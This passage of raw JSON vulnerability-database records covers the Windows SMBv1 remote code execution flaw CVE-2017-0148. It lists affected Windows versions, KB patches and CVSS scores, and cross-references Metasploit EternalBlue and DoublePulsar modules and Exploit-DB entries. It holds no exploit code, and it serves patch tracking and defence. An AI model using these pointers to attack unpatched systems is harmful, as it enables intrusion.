x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:51:19", "differentElements": ["msAffectedSoftware"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T06:46:35", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T06:46:35", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-05T06:46:35", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012215", "KB3210720", "KB3213986", "KB3205409", "KB3205401", "KB4012214", "KB3212646", 
"KBMS16-110, 3187754", "KB4013429", "KB4013198", "KB4012216", "KB4012213", "KB4012598", "KB4012212", "KB4012606", "KB4012217", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:46:35", "differentElements": ["msAffectedSoftware"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T08:49:10", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T08:49:10", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-05T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB4012212", "KB3213986", "KB3210720", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3205409", "KB3212646", "KB3210721", "KB4012214", "KB3177186", "KB4012215", "KB4012213", "KB4012216", "KB4013198", "KB4013429", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 12}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T18:46:16", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 